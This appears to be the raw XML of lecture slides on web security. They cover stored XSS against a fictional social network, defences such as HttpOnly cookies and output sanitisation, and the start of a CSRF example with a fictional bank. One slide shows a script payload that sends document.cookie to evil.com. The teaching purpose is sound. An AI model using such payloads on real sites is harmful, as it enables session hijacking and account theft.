        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387565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Vulnerable Website, Type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730963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose we have a social network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.friendly.com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67543" y="2898710"/>
            <a:ext cx="8870302" cy="3719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0" b="11799"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567543" y="3551852"/>
            <a:ext cx="8870302" cy="30666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79983" y="2911150"/>
            <a:ext cx="8857862" cy="64070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</a:rPr>
              <a:t>   friendly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253274" y="3032448"/>
            <a:ext cx="3396342" cy="39810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36980" y="3772676"/>
            <a:ext cx="248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Latest Status Updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3533191" y="4282526"/>
            <a:ext cx="5567266" cy="74178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I hope you like pop-tarts ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Monday, March 23, 2015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80" y="4282526"/>
            <a:ext cx="741784" cy="74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8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Stored XSS Attack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8605" y="1655431"/>
            <a:ext cx="9019591" cy="9758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/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>="http://evil.com/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);&lt;/script&gt;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938" y="4739432"/>
            <a:ext cx="1005227" cy="10052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54906" y="5882073"/>
            <a:ext cx="2831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Origin: www.friendly.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>session=xI4f-Qs02fd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09019" y="6176529"/>
            <a:ext cx="1056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evil.com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550" y="3094062"/>
            <a:ext cx="893446" cy="8934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550" y="5269304"/>
            <a:ext cx="893446" cy="89344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498032" y="4034121"/>
            <a:ext cx="1478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friendly.com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585" y="5069440"/>
            <a:ext cx="641882" cy="6418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27" y="3540785"/>
            <a:ext cx="1245186" cy="1245186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5307691" y="5224046"/>
            <a:ext cx="3344897" cy="487276"/>
            <a:chOff x="5307691" y="5224046"/>
            <a:chExt cx="3344897" cy="487276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5307691" y="5557252"/>
              <a:ext cx="3344897" cy="15407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 rot="165159">
              <a:off x="5878715" y="5224046"/>
              <a:ext cx="22028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5) GET /?session=…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307691" y="3638353"/>
            <a:ext cx="3344897" cy="1101079"/>
            <a:chOff x="5307691" y="3638353"/>
            <a:chExt cx="3344897" cy="1101079"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5307691" y="3638353"/>
              <a:ext cx="3344897" cy="110107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 rot="20496064">
              <a:off x="5342946" y="3799599"/>
              <a:ext cx="3087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3) GET /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                <a:t>profile.php?uid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>=…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508441" y="3976776"/>
            <a:ext cx="3144148" cy="1044932"/>
            <a:chOff x="5508441" y="3976776"/>
            <a:chExt cx="3144148" cy="1044932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5508441" y="3976776"/>
              <a:ext cx="3144148" cy="104493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 rot="20488569">
              <a:off x="6177014" y="4431822"/>
              <a:ext cx="22152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4) HTTP/1.1 200 OK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260330" y="4176550"/>
            <a:ext cx="3107608" cy="1065496"/>
            <a:chOff x="1260330" y="4176550"/>
            <a:chExt cx="3107608" cy="1065496"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1260330" y="4564443"/>
              <a:ext cx="3107608" cy="67760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 rot="772489">
              <a:off x="1531450" y="4176550"/>
              <a:ext cx="27927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2) Send link to attacker’s profile to the victim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356049" y="2907711"/>
            <a:ext cx="7321420" cy="1123113"/>
            <a:chOff x="1356049" y="2907711"/>
            <a:chExt cx="7321420" cy="1123113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Freeform 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1356049" y="2907711"/>
              <a:ext cx="7321420" cy="1123113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 7321420"/>
                <a:gd name="connsiteY0" fmla="*/ 1123113 h 1123113"/>
                <a:gd name="connsiteX1" fmla="*/ 1150775 w 7321420"/>
                <a:gd name="connsiteY1" fmla="*/ 258477 h 1123113"/>
                <a:gd name="connsiteX2" fmla="*/ 5200261 w 7321420"/>
                <a:gd name="connsiteY2" fmla="*/ 3440 h 1123113"/>
                <a:gd name="connsiteX3" fmla="*/ 7321420 w 7321420"/>
                <a:gd name="connsiteY3" fmla="*/ 395326 h 1123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21420" h="1123113">
                  <a:moveTo>
                    <a:pt x="0" y="1123113"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142032" y="784101"/>
                    <a:pt x="284065" y="445089"/>
                    <a:pt x="1150775" y="258477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2017485" y="71865"/>
                    <a:pt x="4171820" y="-19368"/>
                    <a:pt x="5200261" y="3440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6228702" y="26248"/>
                    <a:pt x="6775061" y="210787"/>
                    <a:pt x="7321420" y="395326"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill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 rot="21434316">
              <a:off x="3324046" y="3025549"/>
              <a:ext cx="33886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1) Post malicious JS to profile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234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Mitigating XSS Attacks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73818"/>
            <a:ext cx="10515600" cy="4969578"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie restrictions – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side filter – X-XSS-Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables heuristics in the browser that attempt to block injected scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="937584" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>request.args.get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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="937584" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>is_valid_base64(x): abort(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"content"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{sanitize(data)}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43714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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cookies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approach to defending against cookie stealing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HttpOnly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/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server may specify that a cookie should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> be exposed in the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, they are still sent with requests as normal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not to be confused with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies marked as Secure may only be sent over HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website designers should, ideally, enable both features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prevent all attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Of course not, it only prevents cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other private data may still be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exfiltrated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the origin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20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Cross-Site Request Forgery (CSRF)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CSRF is another of the basic web attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker tricks victim into accessing URL that performs an unauthorized action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoids the need to read private state (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Abuses the SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All requests to origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’s cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… even if some other origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sends the request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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75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Vulnerable Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982824" y="2313992"/>
            <a:ext cx="10493829" cy="40868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01012" y="2444620"/>
            <a:ext cx="2867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Bank of Washington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3190">
            <a:off x="3790170" y="2479459"/>
            <a:ext cx="713405" cy="3831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758335" y="2477076"/>
            <a:ext cx="2438400" cy="37748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0867053" y="2477076"/>
            <a:ext cx="329682" cy="377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776626" y="3217740"/>
          <a:ext cx="8776044" cy="4921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62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2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2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26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26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26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21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Account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Transfer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Invest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Learn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Locations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Contact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625195" y="2477076"/>
            <a:ext cx="2024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Welcome, Christo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51438" y="4110681"/>
            <a:ext cx="6936259" cy="21006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dirty="0"/>
              <a:t>Transfer Money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50361" y="4819908"/>
            <a:ext cx="1447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</a:rPr>
              <a:t>To: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50361" y="5443212"/>
            <a:ext cx="1447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</a:rPr>
              <a:t>Amount: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36158" y="4843345"/>
            <a:ext cx="2704397" cy="414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36157" y="5491285"/>
            <a:ext cx="2704397" cy="414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531113" y="5457457"/>
            <a:ext cx="1494160" cy="4824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Transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275760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6342" y="421423"/>
            <a:ext cx="2094335" cy="461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Client Side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82589" y="418267"/>
            <a:ext cx="2094335" cy="4608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Server Side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429231" y="853391"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="381708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3812374" y="3745695"/>
              <a:ext cx="5250715" cy="23789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781724" y="3387776"/>
              <a:ext cx="3200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GET /login_form.html HTTP/1.1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429231" y="1358803"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817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3780935" y="3774593"/>
              <a:ext cx="5242791" cy="0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477844" y="3387776"/>
              <a:ext cx="1808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HTTP/1.1 200 OK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429231" y="2502116"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="381708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3812375" y="3745695"/>
              <a:ext cx="5250715" cy="23789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045356" y="3387776"/>
              <a:ext cx="26731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POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>login.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t> HTTP/1.1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259391" y="3034093"/>
            <a:ext cx="5541710" cy="684420"/>
            <a:chOff x="3611097" y="3340286"/>
            <a:chExt cx="5541710" cy="373249"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3732253" y="3713535"/>
              <a:ext cx="5291475" cy="0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611097" y="3340286"/>
              <a:ext cx="5541710" cy="3524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HTTP/1.1 302 Found</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Set-Cookie: session=3#4fH8d%dA1; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>HttpOnly</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>; Secure;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469991" y="4053512"/>
            <a:ext cx="5250715" cy="646332"/>
            <a:chOff x="3812377" y="3469443"/>
            <a:chExt cx="5250715" cy="279226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3812377" y="3745696"/>
              <a:ext cx="5250715" cy="2973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742709" y="3469443"/>
              <a:ext cx="3278463" cy="279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GET /money_xfer.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=3#4fH8d%dA1;</a:t>
              </a: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75" y="144897"/>
            <a:ext cx="1005227" cy="1005227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3445648" y="4817103"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="3774593"/>
              <a:ext cx="5242791" cy="0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477844" y="3387776"/>
              <a:ext cx="1808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HTTP/1.1 200 OK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437724" y="5516677"/>
            <a:ext cx="5250715" cy="666960"/>
            <a:chOff x="3820299" y="3219826"/>
            <a:chExt cx="5250715" cy="666960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3820299" y="3862997"/>
              <a:ext cx="5250715" cy="23789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4790800" y="3219826"/>
              <a:ext cx="31822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POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>xfer.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t> HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=3#4fH8d%dA1;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364697" y="6303673"/>
            <a:ext cx="5291475" cy="369331"/>
            <a:chOff x="3715834" y="3387776"/>
            <a:chExt cx="5291475" cy="201415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Straight Arrow Connector 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3715834" y="3589191"/>
              <a:ext cx="5291475" cy="0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5320571" y="3387776"/>
              <a:ext cx="2122761" cy="201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HTTP/1.1 302 Found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768" y="256678"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Left Brace 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926702" y="2672709"/>
            <a:ext cx="329682" cy="1103079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Left Brace 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926702" y="1069921"/>
            <a:ext cx="329682" cy="1107233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Left Brace 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926702" y="5502149"/>
            <a:ext cx="329682" cy="1215872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Left Brace 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926702" y="4206027"/>
            <a:ext cx="329682" cy="1040331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22175" y="1269594"/>
            <a:ext cx="2555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000" dirty="0"/>
              <a:t>GET the login page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22175" y="2562528"/>
            <a:ext cx="25166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 startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>POST username and password, receive a session cookie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22174" y="4376678"/>
            <a:ext cx="2555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 startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>GET the money transfer page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2173" y="5756142"/>
            <a:ext cx="2555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 startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>POST the money transfer request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B51C97-74E1-4FBB-AA3E-F8A20B2D7B1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6902482" y="3253155"/>
            <a:ext cx="1785957" cy="476843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/>
      <p:bldP spid="50" grpId="0"/>
      <p:bldP spid="51" grpId="0"/>
      <p:bldP spid="52" grpId="0"/>
      <p:bldP spid="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113"/>
            <a:ext cx="10515600" cy="1154112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF Attack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1685925" y="1100138"/>
            <a:ext cx="10506075" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assume that the victim is logged-in to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
